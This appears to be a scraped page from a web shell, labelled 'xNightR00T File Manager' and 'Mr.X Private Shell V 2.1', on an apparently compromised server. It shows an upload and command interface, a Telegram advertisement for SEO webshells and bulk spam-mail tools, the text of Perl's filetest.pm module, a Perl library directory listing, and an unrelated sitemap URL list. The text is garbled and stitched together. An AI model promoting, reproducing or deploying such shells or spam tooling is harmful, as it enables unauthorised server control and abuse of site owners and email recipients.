xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
package filetest;

our $VERSION = '1.03';

=head1 NAME

filetest - Perl pragma to control the filetest permission operators

=head1 SYNOPSIS

    $can_perhaps_read = -r "file";	# use the mode bits
    {
        use filetest 'access';		# intuit harder
        $can_really_read = -r "file";
    }
    $can_perhaps_read = -r "file";	# use the mode bits again

=head1 DESCRIPTION

This pragma tells the compiler to change the behaviour of the filetest
permission operators, C<-r> C<-w> C<-x> C<-R> C<-W> C<-X>
(see L<perlfunc>).

The default behaviour of file test operators is to use the simple
mode bits as returned by the stat() family of system calls.  However,
many operating systems have additional features to define more complex
access rights, for example ACLs (Access Control Lists).
For such environments, C<use filetest> may help the permission
operators to return results more consistent with other tools.

The C<use filetest> or C<no filetest> statements affect file tests defined in
their block, up to the end of the closest enclosing block (they are lexically
block-scoped).

Currently, only the C<access> sub-pragma is implemented.  It enables (or
disables) the use of access() when available, that is, on most UNIX systems and
other POSIX environments.  See details below.

=head2 Consider this carefully

The stat() mode bits are probably right for most of the files and
directories found on your system, because few people want to use the
additional features offered by access(). But you may encounter surprises
if your program runs on a system that uses ACLs, since the stat()
information won't reflect the actual permissions.

There may be a slight performance decrease in the filetest operations
when the filetest pragma is in effect, because checking bits is very
cheap.

Also, note that using the file tests for security purposes is a lost cause
from the start: there is a window open for race conditions (who is to
say that the permissions will not change between the test and the real
operation?).  Therefore if you are serious about security, just try
the real operation and test for its success - think in terms of atomic
operations.  Filetests are more useful for filesystem administrative
tasks, when you have no need for the content of the elements on disk.

=head2 The "access" sub-pragma

UNIX and POSIX systems provide an abstract access() operating system call,
which should be used to query the read, write, and execute rights. This
function hides various distinct approaches in additional operating system
specific security features, like Access Control Lists (ACLs)

The extended filetest functionality is used by Perl only when the argument
of the operators is a filename, not when it is a filehandle.

=head2 Limitation with regard to C<_>

Because access() does not invoke stat() (at least not in a way visible
to Perl), B<the stat result cache "_" is not set>.  This means that the
outcome of the following two tests is different.  The first has the stat
bits of F</etc/passwd> in C<_>, and in the second case this still
contains the bits of C</etc>.

 { -d '/etc';
   -w '/etc/passwd';
   print -f _ ? 'Yes' : 'No';   # Yes
 }

 { use filetest 'access';
   -d '/etc';
   -w '/etc/passwd';
   print -f _ ? 'Yes' : 'No';   # No
 }

Of course, unless your OS does not implement access(), in which case the
pragma is simply ignored.  Best not to use C<_> at all in a file where
the filetest pragma is active!

As a side effect, as C<_> doesn't work, stacked filetest operators
(C<-f -w $file>) won't work either.

This limitation might be removed in a future version of perl.

=cut

$filetest::hint_bits = 0x00400000; # HINT_FILETEST_ACCESS

sub import {
    if ( $_[1] eq 'access' ) {
	$^H |= $filetest::hint_bits;
    } else {
	die "filetest: the only implemented subpragma is 'access'.\n";
    }
}

sub unimport {
    if ( $_[1] eq 'access' ) {
	$^H &= ~$filetest::hint_bits;
    } else {
	die "filetest: the only implemented subpragma is 'access'.\n";
    }
}

1;

Filemanager

Name Type Size Permission Actions
App Folder 0755
Archive Folder 0755
Attribute Folder 0755
B Folder 0755
CGI Folder 0755
CPAN Folder 0755
CPANPLUS Folder 0755
Carp Folder 0755
Class Folder 0755
Compress Folder 0755
Config Folder 0755
DBM_Filter Folder 0755
Devel Folder 0755
Digest Folder 0755
Encode Folder 0755
Exporter Folder 0755
ExtUtils Folder 0755
File Folder 0755
Filter Folder 0755
Getopt Folder 0755
HTTP Folder 0755
I18N Folder 0755
IO Folder 0755
IPC Folder 0755
JSON Folder 0755
Locale Folder 0755
Log Folder 0755
Math Folder 0755
Memoize Folder 0755
Module Folder 0755
Net Folder 0755
Object Folder 0755
Package Folder 0755
Params Folder 0755
Parse Folder 0755
Perl Folder 0755
PerlIO Folder 0755
Pod Folder 0755
Search Folder 0755
TAP Folder 0755
Term Folder 0755
Test Folder 0755
Text Folder 0755
Thread Folder 0755
Tie Folder 0755
Time Folder 0755
Unicode Folder 0755
User Folder 0755
autodie Folder 0755
encoding Folder 0755
inc Folder 0755
overload Folder 0755
pod Folder 0755
unicore Folder 0755
version Folder 0755
warnings Folder 0755
x86_64-linux-thread-multi Folder 0755
AnyDBM_File.pm File 2.56 KB 0444
AutoLoader.pm File 15.42 KB 0444
AutoSplit.pm File 19.18 KB 0444
Benchmark.pm File 27.87 KB 0444
CGI.pm File 255.24 KB 0444
CORE.pod File 3.19 KB 0444
CPAN.pm File 134.28 KB 0444
CPANPLUS.pm File 7.06 KB 0444
Carp.pm File 21.49 KB 0444
DB.pm File 18.43 KB 0444
DBM_Filter.pm File 14.05 KB 0444
Digest.pm File 10.45 KB 0444
DirHandle.pm File 1.52 KB 0444
Dumpvalue.pm File 16.5 KB 0444
English.pm File 4.59 KB 0444
Env.pm File 5.39 KB 0444
Exporter.pm File 18.31 KB 0444
Fatal.pm File 43.62 KB 0444
FileCache.pm File 5.44 KB 0444
FileHandle.pm File 6.62 KB 0444
FindBin.pm File 4.45 KB 0444
Memoize.pm File 35.34 KB 0444
NEXT.pm File 18.05 KB 0444
PerlIO.pm File 10.19 KB 0444
Safe.pm File 24.28 KB 0444
SelectSaver.pm File 1.05 KB 0444
SelfLoader.pm File 16.94 KB 0444
Symbol.pm File 4.68 KB 0444
Test.pm File 28.21 KB 0444
Thread.pm File 8.09 KB 0444
UNIVERSAL.pm File 6.97 KB 0444
XSLoader.pm File 11.05 KB 0444
_charnames.pm File 31.02 KB 0444
autodie.pm File 11.66 KB 0444
autouse.pm File 4.14 KB 0444
base.pm File 6.37 KB 0444
bigint.pm File 18.34 KB 0444
bignum.pm File 17.75 KB 0444
bigrat.pm File 13.61 KB 0444
blib.pm File 2.04 KB 0444
bytes.pm File 2.96 KB 0444
bytes_heavy.pl File 758 B 0444
charnames.pm File 19.83 KB 0444
constant.pm File 13.04 KB 0444
deprecate.pm File 3.01 KB 0444
diagnostics.pm File 18.14 KB 0444
dumpvar.pl File 15.24 KB 0444
feature.pm File 11.89 KB 0444
fields.pm File 9.28 KB 0444
filetest.pm File 3.91 KB 0444
if.pm File 1.13 KB 0444
integer.pm File 3.19 KB 0444
less.pm File 3.13 KB 0444
locale.pm File 3.12 KB 0444
open.pm File 7.83 KB 0444
overload.pm File 51.41 KB 0444
overloading.pm File 1.77 KB 0444
parent.pm File 2.83 KB 0444
perl5db.pl File 307.87 KB 0444
perlfaq.pm File 94 B 0444
sigtrap.pm File 7.44 KB 0444
sort.pm File 5.94 KB 0444
strict.pm File 3.84 KB 0444
subs.pm File 845 B 0444
utf8.pm File 7.61 KB 0444
utf8_heavy.pl File 30.22 KB 0444
vars.pm File 2.36 KB 0444
version.pm File 5.16 KB 0444
version.pod File 9.63 KB 0444
vmsish.pm File 4.22 KB 0444
warnings.pm File 20.14 KB 0444
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml